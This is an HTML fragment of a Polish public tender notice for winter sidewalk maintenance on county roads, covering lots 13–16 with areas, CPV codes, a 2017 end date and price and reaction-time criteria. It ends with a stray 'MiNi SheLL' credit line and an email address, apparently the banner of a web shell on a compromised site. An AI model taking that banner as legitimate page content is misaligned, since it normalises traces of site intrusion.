                <b>Nazwa: </b>zimowe utrzymanie chodnika w ciągu dr. powiatowej 1235K Racławice  Wrocimowice      m. Racławice na pow. 1500m2 i w ciągu dr. powiatowej 1233K Kropidło-Racławice       m. Racławice na pow. 630m2      - materiał do posypywania Zamawiającego.  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>     Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>14
                  
                <b>Nazwa: </b>zimowe utrzymanie chodnika w ciągu dr. powiatowej  1194K Gr.  woj.  Kozłów  Książ           Wielki   Słaboszów m. Książ Wielki na  pow.1564m2  i w ciągu dr.1219K Książ         Wlk.   Zaryszyn w m. Książ Wielki na pow. 415m2 i w m. Książ Mały na pow.884m2        - materiał do posypywania Zamawiającego.  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>15
                  
                <b>Nazwa: </b>zimowe utrzymanie chodnika w ciągu dr. powiatowej 1137K Boża Wola  Jeżówka        Tczyca m. Tczyca na pow. 715m2 i w ciągu dr. powiatowej 1177K Tczyca  Jeżówka        Tczyca m. Tczyca na pow. 248m2 i w ciągu dr. powiatowej 1186K Jelcza  Podmiejska        Wola m.Jelcza na pow.738m2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>     Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>16
                  
                <b>Nazwa: </b>zimowe utrzymanie chodnika w ciągu dr. powiatowej 1186K Jelcza  Podmiejska        Wola m. Charsznica na pow. 6333m2 i w ciągu dr. powiatowej 1175K Charsznica do dr.      783 m. Charsznica na pow. 2022m2      - materiał do posypywania Zamawiającego.  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>     Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com